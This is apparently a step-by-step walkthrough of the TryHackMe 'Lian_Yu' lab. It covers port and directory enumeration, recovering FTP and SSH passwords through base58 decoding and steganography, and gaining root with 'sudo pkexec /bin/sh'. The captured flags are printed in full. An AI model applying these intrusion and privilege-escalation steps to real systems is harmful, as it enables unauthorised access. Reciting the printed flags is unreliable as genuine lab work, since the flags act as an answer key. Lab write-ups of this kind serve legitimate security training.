Room Link : https://tryhackme.com/r/room/lianyu
STEP1
nmap -p- -sSV 10.10.98.77 -Pn -A -T4
FINDING
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
80/tcp open http Apache httpd
|_http-title: Purgatory
|_http-server-header: Apache
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35261/udp6 status
| 100024 1 45319/udp status
| 100024 1 46264/tcp status
|_ 100024 1 52094/tcp6 status
46264/tcp open status 1 (RPC #100024)
------------------------------------------------------------------------------------
STEP2
feroxbuster --url http://10.10.98.77
FINDING
200 GET 59l 358w 2506c http://10.10.98.77/
301 GET 7l 20w 234c http://10.10.98.77/island = http://10.10.98.77/island/
FINDING
http://10.10.98.77/island/
go inspect to find the code
vigilante
------------------------------------------------------------------------------------
STEP3
gobuster dir -u 10.10.13.232/island -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
FINDING
2100
QUESTION
What is the Web Directory you found?
2100
------------------------------------------------------------------------------------
STEP4
http://10.10.13.232/island/2100
go to source
FINDING
!-- you can avail your .ticket here but how? --
means the file extinction is .ticket
------------------------------------------------------------------------------------
STEP5
gobuster dir -u 10.10.13.232/island/2100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .ticket
FINDING
http://10.10.164.47/island/2100/green_arrow.ticket
what is the file name you found?
green_arrow.ticket
This is just a token to get into Queens Gambit(Ship)
RTy8yhBQdscX
use -- https://appdevtools.com/base58-encoder-decoder -- to decode base58
!#th3h00d
what is the FTP Password?
!#th3h00d
------------------------------------------------------------------------------------
STEP6
ftp 10.10.164.47
root : vigilante
pwd : !#th3h00d
ls -la
get aa.jpg
get Queens_Gambit.png
get Leave_me_alone.png
get .other_user
------------------------------------------------------------------------------------
STEP7
convert Leave_me_alone.png to proper .png file
hexedit Leave_me_alone.png
and change top left 8 two digit format to 89 50 4E 47 0D 0A 1A 0A and
ctrl + c
open the file in .png and get the password
FINDING
password is the password
------------------------------------------------------------------------------------
STEP8
steghide extract -sf aa.jpg
passphrase : password
a zip fill will appear
unzip it
FINDING
passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
shado
M3tahuman
what is the file name with SSH password?
shado
------------------------------------------------------------------------------------
STEP9
OPEN .other_user we got from ftp
FINDING
slade is the ssh user name
ssh [email protected]
pwd : M3tahuman
------------------------------------------------------------------------------------
STEP10
ls -la
cat user.txt
user.txt
THM{P30P7E_K33P_53CRET5__C0MPUT3R5_D0NT}
------------------------------------------------------------------------------------
STEP11
sudo -l
pwd : M3tahuman
FINDING
(root) PASSWD: /usr/bin/pkexec
------------------------------------------------------------------------------------
STEP12
search on gtfobin
https://gtfobins.github.io/gtfobins/pkexec/#sudo
FINDING
sudo pkexec /bin/sh
whoami
root
cd /root
cat root.txt
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_ILL_BE_D34D}
root.txt
THM{MY_W0RD_I5_MY_B0ND_IF_I_ACC3PT_YOUR_CONTRACT_THEN_IT_WILL_BE_COMPL3TED_OR_ILL_BE_D34D}
------------------------------------------------------------------------------------
|
|